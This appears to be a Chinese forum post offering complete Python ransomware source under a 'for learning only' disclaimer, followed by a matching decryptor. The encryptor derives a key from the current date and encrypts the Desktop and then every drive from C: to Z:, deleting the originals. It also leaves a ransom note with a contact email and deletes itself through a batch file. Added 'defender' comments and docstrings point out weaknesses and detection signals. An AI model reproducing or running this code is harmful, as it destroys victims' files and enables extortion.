物理 自研勒索病毒,py源码!

⚠禁止用于非法用途,本贴仅供学习技术⚠
病毒源码👇
import os
import sys
import base64
from datetime import datetime
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
import threading
# Derive the Fernet key for this sample from a date string.
# PBKDF2-HMAC-SHA256, 100000 iterations, 32-byte output, returned
# urlsafe-base64 encoded.
# NOTE(defender): the salt is the constant b'salt_' and date_str is the only
# input, so the key is reproducible from the date alone; the decryptor listing
# on this page calls an identical function with a user-typed YYYYMMDD date.
def generate_key_from_date(date_str):
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=b'salt_',
iterations=100000,
backend=default_backend()
)
return base64.urlsafe_b64encode(kdf.derive(date_str.encode()))
# Process a single file: read it whole, write the ciphertext to
# "<filepath>._locked_", then delete the original.
# Any exception is caught and printed, and the file is skipped.
def encrypt_file(filepath, cipher):
try:
# Files ending in '.locked' or '.dll' are left alone.
# NOTE(defender): the suffix written below is '._locked_', which does not end
# with '.locked'. During recovery, expect files that carry more than one
# '._locked_' suffix; each layer needs its own decrypt pass.
if any(filepath.lower().endswith(ext) for ext in ['.locked', '.dll']):
return
# Skip the running program itself
current_exe = os.path.abspath(sys.argv[0])
if os.path.abspath(filepath) == current_exe:
return
print(f"正在加密: {filepath}")
with open(filepath, 'rb') as f:
data = f.read()
encrypted = cipher.encrypt(data)
with open(filepath + '._locked_', 'wb') as f:
f.write(encrypted)
# NOTE(defender): the plaintext is only unlinked here; this block never
# overwrites it, so backups or deleted-file recovery may still hold it.
os.remove(filepath)
except Exception as e:
print(f"跳过文件(加密失败): {filepath} | 错误: {str(e)}")
# Walk `folder` recursively and hand every file found to encrypt_file.
def encrypt_folder(folder, cipher):
for root, _, files in os.walk(folder):
for file in files:
encrypt_file(os.path.join(root, file), cipher)
# Process the current user's Desktop folder (home directory + 'Desktop')
# before anything else, if that folder exists.
# NOTE(defender): when that Desktop sits on a drive that encrypt_other_drives
# walks afterwards, the same location is visited a second time in one run.
def encrypt_desktop_first(cipher):
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
if os.path.exists(desktop):
print("\n=== 优先加密桌面文件 ===")
encrypt_folder(desktop, cipher)
# Walk every existing drive root from C:\ to Z:\ and pass each file to
# encrypt_file.
# NOTE(defender): the observable behaviour is a sequential read / write /
# delete sweep over all present drive letters that leaves files ending in
# '._locked_'; that suffix and the sweep pattern are usable detection signals.
def encrypt_other_drives(cipher):
# Directory names whose files are left untouched.
skip_dirs = {'Windows', 'Program Files', 'System Volume Information'}
drives = [f"{d}:\\" for d in 'CDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f"{d}:\\")]
for drive in drives:
print(f"\n=== 开始加密盘符: {drive} ===")
for root, dirs, files in os.walk(drive):
# Substring test against the whole directory path, so any path that merely
# contains one of these names is skipped as well. `dirs` is not modified.
if any(skip_dir in root for skip_dir in skip_dirs):
continue
for file in files:
encrypt_file(os.path.join(root, file), cipher)
# Remove the program from disk after it has run.
# Writes "<program path>.bat" containing a ping-based delay, a `del` of the
# program and a `del` of the batch file itself, then launches it with
# os.startfile. Failures are caught and printed.
# NOTE(defender): a short-lived .bat created beside the executable, followed
# by `ping 127.0.0.1 -n 3` and `del`, is a usable detection signal; the
# sample may already be gone from disk by the time of triage.
def self_delete():
exe_path = os.path.abspath(sys.argv[0])
try:
bat_path = exe_path + ".bat"
with open(bat_path, 'w') as f:
f.write(f"""@echo off
ping 127.0.0.1 -n 3 >nul
del "{exe_path}"
del "%~f0"
""")
os.startfile(bat_path)
except Exception as e:
print(f"[!] 自删除失败: {e}")
# Top-level routine: derive the key for today's date, process the Desktop and
# then all drives, write the ransom note, and call self_delete().
def encrypt_system():
# The only key input is the local date formatted as YYYYMMDD.
encryption_date = datetime.now().strftime("%Y%m%d")
key = generate_key_from_date(encryption_date)
cipher = Fernet(key)
print(f"=== 开始加密系统(密钥日期: {encryption_date})===")
encrypt_desktop_first(cipher)
# The thread is joined immediately, so the drive walk finishes before the
# note is written.
thread = threading.Thread(target=encrypt_other_drives, args=(cipher,))
thread.start()
thread.join()
# NOTE(defender): the note's file name and the contact address inside it are
# indicators for this sample. The note also records the encryption date,
# which is the value the decryptor listing on this page asks for.
ransom_note = os.path.join(os.path.expanduser('~'), 'Desktop', '!!!看我看我!!!.txt')
with open(ransom_note, 'w') as f:
f.write(
f"你的文件已被加密!\n"
f"加密日期:{encryption_date}\n"
f"想要恢复文件,向 bruce201105@gmail.com 发一封邮件,并附上加密日期,以领取文件解密器!"
)
print("\n=== 加密完成!准备自毁 ===")
self_delete()
# Entry point: executing the file calls encrypt_system() immediately, with no
# prompt or confirmation.
if __name__ == "__main__":
encrypt_system()
解密器源码👇
import os
import sys
import base64
from datetime import datetime
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
import threading
def generate_key_from_date(date_str):
    """Rebuild the Fernet key that belongs to a ``YYYYMMDD`` date string.

    The date text is stretched with PBKDF2-HMAC-SHA256 (fixed salt
    ``b'salt_'``, 100000 iterations, 32-byte output) and the result is
    urlsafe-base64 encoded. The same date always yields the same key, which
    is why the date recorded in the ransom note is enough for recovery.

    Args:
        date_str: The encryption date as text, e.g. ``"20230517"``.

    Returns:
        The urlsafe-base64 encoded 32-byte key as ``bytes``.
    """
    derivation = PBKDF2HMAC(
        backend=default_backend(),
        iterations=100000,
        salt=b'salt_',
        length=32,
        algorithm=hashes.SHA256(),
    )
    raw_key = derivation.derive(date_str.encode())
    return base64.urlsafe_b64encode(raw_key)
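def is_valid_date(date_str):
    """Return True when *date_str* is a real calendar date written as YYYYMMDD.

    Only the ASCII digits 0-9 are accepted. ``str.isdigit()`` also returns
    True for other Unicode digit forms (for example full-width digits typed
    through an input method). Such input would derive a different key from
    the same date, because the key derivation works on the encoded bytes of
    the string, and every file would then fail to decrypt.

    Args:
        date_str: The text typed by the user.

    Returns:
        True for eight ASCII digits that form a valid date, otherwise False.
    """
    if len(date_str) != 8 or any(ch not in "0123456789" for ch in date_str):
        return False
    try:
        datetime.strptime(date_str, "%Y%m%d")
    except ValueError:
        # Eight digits that are not a calendar date, e.g. month 13.
        return False
    return True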
def decrypt_file(filepath, cipher):
    """Restore one ``._locked_`` file in place.

    Files whose name does not end in ``._locked_`` (case-insensitive) and the
    running program itself are ignored. Otherwise the file is read whole,
    decrypted with *cipher*, written back under the name without the trailing
    ``._locked_``, and the encrypted copy is deleted. Only one suffix is
    removed per call, so a file carrying several stacked ``._locked_``
    suffixes needs one call per layer.

    Any exception (wrong key, unreadable file, ...) is caught and reported;
    the encrypted file is then left where it is.

    Args:
        filepath: Path of the candidate file.
        cipher: Object exposing ``decrypt(bytes) -> bytes``.
    """
    locked_suffix = '._locked_'
    try:
        if filepath.lower().endswith(locked_suffix):
            this_program = os.path.abspath(sys.argv[0])
            if os.path.abspath(filepath) != this_program:
                print(f"正在解密: {filepath}")
                with open(filepath, 'rb') as locked_fh:
                    token = locked_fh.read()
                plaintext = cipher.decrypt(token)
                # Drop the trailing "._locked_" to get the original name.
                original_path = filepath[:-len(locked_suffix)]
                with open(original_path, 'wb') as restored_fh:
                    restored_fh.write(plaintext)
                # The encrypted copy is removed only after the write succeeded.
                os.remove(filepath)
                print(f"解密成功: {original_path}")
    except Exception as e:
        print(f"跳过文件(解密失败): {filepath} | 错误: {str(e)}")
def decrypt_folder(folder, cipher):
    """Run ``decrypt_file`` on every file below *folder*, recursively.

    Args:
        folder: Directory to walk.
        cipher: Cipher object passed through to ``decrypt_file``.
    """
    for current_dir, _subdirs, names in os.walk(folder):
        candidate_paths = (os.path.join(current_dir, name) for name in names)
        for path in candidate_paths:
            decrypt_file(path, cipher)
def decrypt_desktop_first(cipher):
    """Restore the current user's Desktop folder before the drive walk.

    Does nothing when the home directory has no ``Desktop`` entry. A later
    drive walk that also covers this folder strips a further ``._locked_``
    layer from any file that still has one.

    Args:
        cipher: Cipher object passed through to ``decrypt_folder``.
    """
    home_dir = os.path.expanduser('~')
    desktop = os.path.join(home_dir, 'Desktop')
    if not os.path.exists(desktop):
        return
    print("\n=== 优先解密桌面文件 ===")
    decrypt_folder(desktop, cipher)
def decrypt_other_drives(cipher):
    """Run ``decrypt_file`` on every file of every existing drive C:\\ to Z:\\.

    Files in a directory whose path contains ``Windows``, ``Program Files``
    or ``System Volume Information`` are skipped. The test is a substring
    match on the directory path, the same test the encryptor listing on this
    page applies.

    Args:
        cipher: Cipher object passed through to ``decrypt_file``.
    """
    skip_dirs = {'Windows', 'Program Files', 'System Volume Information'}

    # Collect the drive roots that exist before touching any file.
    drives = []
    for letter in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
        drive_root = f"{letter}:\\"
        if os.path.exists(drive_root):
            drives.append(drive_root)

    for drive in drives:
        print(f"\n=== 开始解密盘符: {drive} ===")
        for current_dir, _subdirs, names in os.walk(drive):
            in_skipped_dir = any(marker in current_dir for marker in skip_dirs)
            if not in_skipped_dir:
                for name in names:
                    decrypt_file(os.path.join(current_dir, name), cipher)
def decrypt_system():
    """Interactive recovery run: ask for the date, rebuild the key, decrypt.

    Prompts for the encryption date (YYYYMMDD). An invalid date prints an
    error and exits with status 1. Otherwise the key is derived from the
    date, the Desktop is processed first, and then all drives are processed
    in a worker thread that is joined before the completion message.
    """
    date_str = input("请输入加密时的日期密钥(格式YYYYMMDD): ")
    if is_valid_date(date_str):
        cipher = Fernet(generate_key_from_date(date_str))
        print(f"=== 开始解密系统(密钥日期: {date_str})===")
        decrypt_desktop_first(cipher)
        drive_worker = threading.Thread(
            target=decrypt_other_drives,
            args=(cipher,),
        )
        drive_worker.start()
        # Wait for the drive walk to finish before reporting completion.
        drive_worker.join()
        print("\n=== 解密完成! ===")
    else:
        print("日期格式错误,应为YYYYMMDD,例如:20230517")
        sys.exit(1)
# Script entry point: start the interactive recovery run only when this file
# is executed directly, not when it is imported.
if __name__ == "__main__":
    decrypt_system()